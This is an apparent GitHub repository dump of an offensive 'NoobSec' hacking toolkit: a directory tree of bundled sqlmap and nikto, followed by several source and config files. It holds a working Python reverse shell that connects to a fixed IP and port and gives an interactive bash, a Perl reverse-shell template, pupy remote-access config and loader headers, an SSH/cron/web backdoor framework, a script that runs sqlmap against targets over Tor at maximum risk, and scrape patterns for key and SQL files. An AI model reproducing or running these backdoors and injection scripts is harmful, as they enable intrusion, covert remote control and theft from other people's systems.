prettyprint │ │ │ ├── __init__.py │ │ │ └── prettyprint.py │ │ ├── pydes │ │ │ ├── __init__.py │ │ │ └── pyDes.py │ │ ├── socks │ │ │ ├── LICENSE │ │ │ └── socks.py │ │ ├── termcolor │ │ │ └── termcolor.py │ │ └── xdot │ │ │ ├── __init__.py │ │ │ └── xdot.py │ ├── txt │ │ ├── common-columns.txt │ │ ├── common-outputs.txt │ │ ├── common-tables.txt │ │ ├── keywords.txt │ │ ├── smalldict.txt │ │ ├── user-agents.txt │ │ └── wordlist.zip │ ├── udf │ │ ├── README.txt │ │ ├── mysql │ │ │ ├── linux │ │ │ │ ├── 32 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ └── 64 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ └── windows │ │ │ │ ├── 32 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ └── 64 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ └── postgresql │ │ │ ├── linux │ │ │ ├── 32 │ │ │ │ ├── 8.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── 64 │ │ │ │ ├── 8.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── windows │ │ │ └── 32 │ │ │ ├── 8.2 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.3 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.4 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ └── 9.0 │ │ │ └── lib_postgresqludf_sys.dll_ │ ├── waf │ │ ├── 360.py │ │ ├── __init__.py │ │ ├── airlock.py │ │ ├── anquanbao.py │ │ ├── baidu.py │ │ ├── barracuda.py │ │ ├── bigip.py │ │ ├── binarysec.py │ │ ├── blockdos.py │ │ ├── ciscoacexml.py │ │ ├── cloudflare.py │ │ ├── datapower.py │ │ ├── denyall.py │ │ ├── dotdefender.py │ │ ├── edgecast.py │ │ ├── expressionengine.py │ │ ├── fortiweb.py │ │ ├── hyperguard.py │ │ ├── incapsula.py │ │ ├── isaserver.py │ │ ├── jiasule.py │ │ ├── knownsec.py │ │ ├── kona.py │ │ ├── modsecurity.py │ │ ├── netcontinuum.py │ │ ├── netscaler.py │ │ ├── paloalto.py │ │ ├── profense.py │ │ ├── proventia.py │ │ ├── radware.py │ │ ├── requestvalidationmode.py │ │ ├── safedog.py │ │ ├── secureiis.py │ │ ├── senginx.py │ │ ├── sucuri.py │ │ ├── teros.py │ │ ├── trafficshield.py │ │ ├── urlscan.py │ │ ├── uspses.py │ │ ├── varnish.py │ │ ├── webappsecure.py │ │ └── webknight.py │ └── xml │ │ ├── banner │ │ ├── cookie.xml │ │ ├── generic.xml │ │ ├── mssql.xml │ │ ├── mysql.xml │ │ ├── oracle.xml │ │ ├── postgresql.xml │ │ ├── server.xml │ │ ├── servlet.xml │ │ ├── sharepoint.xml │ │ ├── x-aspnet-version.xml │ │ └── x-powered-by.xml │ │ ├── boundaries.xml │ │ ├── errors.xml │ │ ├── livetests.xml │ │ ├── payloads │ │ ├── 01_boolean_blind.xml │ │ ├── 02_error_based.xml │ │ ├── 03_inline_query.xml │ │ ├── 04_stacked_queries.xml │ │ ├── 05_time_blind.xml │ │ └── 06_union_query.xml │ │ ├── queries.xml │ │ └── sqlmap.xsd │ └── vscan │ ├── databases │ ├── db_404_strings │ ├── db_content_search │ ├── db_dictionary │ ├── db_drupal │ ├── db_embedded │ ├── db_favicon │ ├── db_headers │ ├── db_httpoptions │ ├── db_multiple_index │ ├── db_outdated │ ├── db_parked_strings │ ├── db_realms │ ├── db_server_msgs │ ├── db_subdomains │ ├── db_tests │ └── db_variables │ ├── docs │ ├── CHANGES.txt │ ├── LICENSE.txt │ ├── manual.xml │ ├── nikto.1 │ ├── nikto.dtd │ └── nikto_manual.html │ ├── nikto.conf │ ├── nikto.pl │ ├── plugins │ ├── LW2.pm │ ├── nikto_apache_expect_xss.plugin │ ├── nikto_apacheusers.plugin │ ├── nikto_auth.plugin │ ├── nikto_cgi.plugin │ ├── nikto_clientaccesspolicy.plugin │ ├── nikto_content_search.plugin │ ├── nikto_cookies.plugin │ ├── nikto_core.plugin │ ├── nikto_dictionary_attack.plugin │ ├── nikto_drupal.plugin │ ├── nikto_embedded.plugin │ ├── nikto_favicon.plugin │ ├── nikto_fileops.plugin │ ├── nikto_headers.plugin │ ├── nikto_httpoptions.plugin │ ├── nikto_ms10_070.plugin │ ├── nikto_msgs.plugin │ ├── nikto_multiple_index.plugin │ ├── nikto_negotiate.plugin │ ├── nikto_outdated.plugin │ ├── nikto_parked.plugin │ ├── nikto_paths.plugin │ ├── nikto_put_del_test.plugin │ ├── nikto_report_csv.plugin │ ├── nikto_report_html.plugin │ ├── nikto_report_nbe.plugin │ ├── nikto_report_sqlg.plugin │ ├── nikto_report_text.plugin │ ├── nikto_report_xml.plugin │ ├── nikto_robots.plugin │ ├── nikto_shellshock.plugin │ ├── nikto_siebel.plugin │ ├── nikto_sitefiles.plugin │ ├── nikto_ssl.plugin │ ├── nikto_subdomain.plugin │ └── nikto_tests.plugin │ ├── replay.pl │ └── templates │ ├── htm_close.tmpl │ ├── htm_end.tmpl │ ├── htm_host_head.tmpl │ ├── htm_host_im.tmpl │ ├── htm_host_item.tmpl │ ├── htm_start.tmpl │ ├── htm_stop.tmpl │ ├── htm_summary.tmpl │ ├── xml_close.tmpl │ ├── xml_end.tmpl │ ├── xml_host_head.tmpl │ ├── xml_host_im.tmpl │ ├── xml_host_item.tmpl │ └── xml_start.tmpl ├── README.md └── snap └── snapcraft.yaml /NoobSecToolkit - MAC OSX/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/.DS_Store -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/.DS_Store -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | plugins/db.py 3 | auth/ 4 | *.pyc 5 | *.jpg 6 | *.csv 7 | .swp 8 | .DS_Store 9 | .idea 10 | pastebin/seen-pastes.txt 11 | 12 | HOST-RESULTS.txt 13 | 14 | NET-RESULTS.txt 15 | 16 | config/pSearch.dat 17 | 18 | config/pSearch.old.dat 19 | 20 | config/pSearch.dat 21 | 22 | config/pSearch.dat 23 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/config/ports.txt: -------------------------------------------------------------------------------- 1 | 443 2 | 8443 3 | 4443 4 | 1443 5 | 8888 6 | 8080 -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/config/rssfilter.dat: -------------------------------------------------------------------------------- 1 | ddos 2 | hacked 3 | leak 4 | owned 5 | shooting 6 | bombing 7 | attack 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/config/webscrape.dat: -------------------------------------------------------------------------------- 1 | (([a-z]+:\/){0,1}\/.*.zip) 2 | (([a-z]+:\/){0,1}\/.*.pdf) 3 | (([a-z]+:\/){0,1}\/.*.rar) 4 | (([a-z]+:\/){0,1}\/.*.doc) 5 | (([a-z]+:\/){0,1}\/.*.docx) 6 | (([a-z]+:\/){0,1}\/.*.xls) 7 | (([a-z]+:\/){0,1}\/.*.xlsx) 8 | (([a-z]+:\/){0,1}\/.*.sql) 9 | (([a-z]+:\/){0,1}\/.*.pem) 10 | (([a-z]+:\/){0,1}\/.*.key) 11 | (([a-z]+:\/){0,1}\/.*.txt) 12 | (([a-z]+:\/){0,1}\/.*.7z) 13 | (([a-z]+:\/){0,1}\/.*.ppt) 14 | (([a-z]+:\/){0,1}\/.*.pptx) 15 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/pastebin/downloaded/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/OSCAR/pastebin/downloaded/test.test -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/pastebin/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/OSCAR/pastebin/test.test -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import glob 3 | modules = glob.glob(os.path.dirname(__file__)+"/*.py") 4 | __all__ = [ os.path.basename(f)[:-3] for f in modules] -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/plugins/domainip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Module to get the ip address of a given domain.""" 3 | #import socket :P -- Now that is how you comment in code. 4 | import socket 5 | 6 | def c(): 7 | """Get ipaddress of domain..GO DNS!""" 8 | domain = raw_input("Domain: ") 9 | #try to resolve. 10 | try: 11 | chk = socket.gethostbyname_ex(domain) 12 | except Exception: 13 | print "[+]ERROR: could not get hostname!" 14 | raise 15 | print "\nIP Address of", domain, ":", chk[2], "\n" 16 | return 17 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/rss/filter.dat: -------------------------------------------------------------------------------- 1 | ddos 2 | hacked 3 | leak 4 | owned 5 | shooting 6 | bombing 7 | attack 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/rss/news/test.test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/OSCAR/rss/news/test.test -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/OSCAR/setup/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/dns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys, traceback 5 | print "-----------------------------------------------------------" 6 | print "Author: @Zic" 7 | print "Enter the domain below to gather basic DNS information." 8 | print "Example: website.com" 9 | print"------------------------------------------------------------" 10 | target = raw_input("Input Target: ") 11 | cmd1 = os.system ("nslookup -type=any " +target) 12 | 13 | print"-----------" 14 | print "Finished!" 15 | print "----------" 16 | 17 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/mir.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys, traceback 5 | 6 | url = raw_input('What Service do you want to Mirror?: ') 7 | 8 | cmd1 = os.system ('wget -m'+url+') 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/pySteg/pysteg.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | print "-------------------------" 5 | print "StegHide Options" 6 | print "-------------------------" 7 | print "Usage Example :" 8 | print "" 9 | print"To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt" 10 | print "" 11 | print "To extract embedded data from stg.jpg: steghide extract -sf stg.jpg" 12 | 13 | cmd1 = os.system ("xterm ") 14 | 15 | 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sqli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import traceback 6 | 7 | print "SQLI Injector" 8 | 9 | target = raw_input('SQLI Vulnerable Target: ') 10 | 11 | cmd1 = os.system ('python '+'tools/inject/sqlmap.py -u' +target+' --tor --tor-type=SOCKS5 --check-tor --tor-port=9050 --random-agent --level=3 --risk=3 --threads=2') 12 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "2.7" 4 | install: 5 | - pip install -r requirements.txt 6 | script: nosetests -vv --nocapture 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/auxiliary/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/auxiliary/web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/perl/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/perl/a.out -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/perl/prs1: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | use Socket; 5 | use FileHandle; 6 | use POSIX; 7 | my $VERSION = "1.0"; 8 | 9 | # Where to send the reverse shell. Change these. 10 | my $ip = ' 11 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/MyLoadLibrary.h: -------------------------------------------------------------------------------- 1 | #ifndef GENERALLOADLIBRARY_H 2 | #define GENERALLOADLIBRARY_H 3 | 4 | HMODULE MyLoadLibrary(LPCSTR, void *, void *); 5 | 6 | HMODULE MyGetModuleHandle(LPCSTR); 7 | 8 | BOOL MyFreeLibrary(HMODULE); 9 | 10 | FARPROC MyGetProcAddress(HMODULE, LPCSTR); 11 | 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/Python-version.h: -------------------------------------------------------------------------------- 1 | #include 2 | #if (PY_VERSION_HEX < 0x02050000) 3 | # define PYTHON_API_VERSION 1012 4 | typedef int Py_ssize_t; 5 | #else 6 | # define PYTHON_API_VERSION 1013 7 | /* The check for _WIN64 must come first, because on win64 both _WIN64 and 8 | * _WIN32 are defined! 9 | */ 10 | # if defined (_WIN64) 11 | typedef __int64 Py_ssize_t; 12 | # elif defined (_WIN32) 13 | typedef int Py_ssize_t; 14 | # endif 15 | #endif 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/pupy_load.h: -------------------------------------------------------------------------------- 1 | #ifndef PYTHONINTERPRETER 2 | #define PYTHONINTERPRETER 3 | 4 | DWORD WINAPI mainThread(LPVOID lpArg); 5 | #endif 6 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/remote_thread.h: -------------------------------------------------------------------------------- 1 | #ifndef _METERPRETER_REMOTE_THREAD_H 2 | #define _METERPRETER_REMOTE_THREAD_H 3 | 4 | HANDLE create_remote_thread(HANDLE hProcess, SIZE_T sStackSize, LPVOID pvStartAddress, LPVOID pvStartParam, DWORD dwCreateFlags, LPDWORD pdwThreadId); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/client/sources/resources/iter_files.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import marshal, zlib 5 | modules = marshal.loads(zlib.decompress(open("library_compressed_string.txt",'rb').read())) 6 | for f in sorted([x for x in modules.iterkeys()]): 7 | print f 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/crypto/gen.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | openssl req -new -x509 -keyout server.pem -out cert.pem -days 365 -nodes 3 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/modules/process_kill.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | 4 | __class_name__="KillModule" 5 | 6 | class KillModule(PupyModule): 7 | """ kill a process """ 8 | 9 | def init_argparse(self): 10 | self.arg_parser = PupyArgumentParser(prog="kill", description=self.__doc__) 11 | self.arg_parser.add_argument('pid', type=int, help='pid to kill') 12 | 13 | def run(self, args): 14 | self.client.conn.modules.os.kill(args.pid,9) 15 | self.success("process killed !") 16 | 17 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/all/pupyutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/all/pupyutils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.pil -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvB08.png -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/pupymemexec/make.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN32 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/pupymemexec/makex64.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN64 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/all/pupwinutils/msgbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import ctypes 5 | import threading 6 | 7 | def MessageBox(text, title): 8 | t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0)) 9 | t.daemon=True 10 | t.start() 11 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/pupymemexec.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/pupymemexec.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/amd64/vidcap.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/pupymemexec.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/pupymemexec.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/windows/x86/vidcap.pyd -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupy.conf: -------------------------------------------------------------------------------- 1 | [pupyd] 2 | address = 0.0.0.0 3 | port = 443 4 | keyfile = crypto/server.pem 5 | certfile = crypto/cert.pem 6 | 7 | [cmdline] 8 | display_banner = yes 9 | colors = yes 10 | 11 | [aliases] 12 | info = get_info 13 | pyexec = pyexec 14 | exec = shell_exec 15 | ps = ps 16 | migrate = migrate 17 | kill = process_kill 18 | #tasklist = shell_exec 'tasklist /v' 19 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pupy/pupy/pupylib/utils/network.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | import subprocess 3 | 4 | def get_local_ip(iface = 'eth0'): 5 | try: 6 | return subprocess.check_output(["ifconfig", iface]).split("\n")[1].split()[1][5:] 7 | #TODO same for windows 8 | except Exception: 9 | return None 10 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pythScript/pythBackdoor.py: -------------------------------------------------------------------------------- 1 | import socket, subprocess, os; 2 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 3 | s.connect(("192.168.70.129", 53922)); 4 | os.dup2(s.fileno(), 0); 5 | os.dup2(s.fileno(),1); 6 | os.dup2(s.fileno(),2); 7 | o=subprocess.call(["/bin/bash", "-i"]); 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pythScript/pythPart1: -------------------------------------------------------------------------------- 1 | import socket, subprocess, os; 2 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 3 | s.connect((" 4 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/backdoors/shell/pythScript/pythPart2: -------------------------------------------------------------------------------- 1 | ", 53922)); 2 | os.dup2(s.fileno(), 0); 3 | os.dup2(s.fileno(),1); 4 | os.dup2(s.fileno(),2); 5 | o=subprocess.call(["/bin/bash", "-i"]); 6 | 7 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/definitions.py: -------------------------------------------------------------------------------- 1 | from colorama import * 2 | 3 | GOOD = Fore.GREEN + " + " + Fore.RESET 4 | BAD = Fore.RED + " - " + Fore.RESET 5 | WARN = Fore.YELLOW + " * " + Fore.RESET 6 | INFO = Fore.BLUE + " + " + Fore.RESET 7 | 8 | 9 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/imports.py: -------------------------------------------------------------------------------- 1 | import module 2 | ''' 3 | from metasploit import * 4 | from netcat import * 5 | from netcat_traditional import * 6 | from perl import * 7 | from pyth import * 8 | from pupy import * 9 | from bash import * 10 | from bash2 import * 11 | ''' 12 | from poison import * 13 | from web import * 14 | from webMod import * 15 | from cron import * 16 | -------------------------------------------------------------------------------- /NoobSecToolkit - MAC OSX/scripts/sshbackdoors/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | from os.path import dirname, basename, isfile 3 | import glob 4 | modules = glob.glob(dirname(__file__)+"/*.py") 5 | __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] 6 | ''' 7 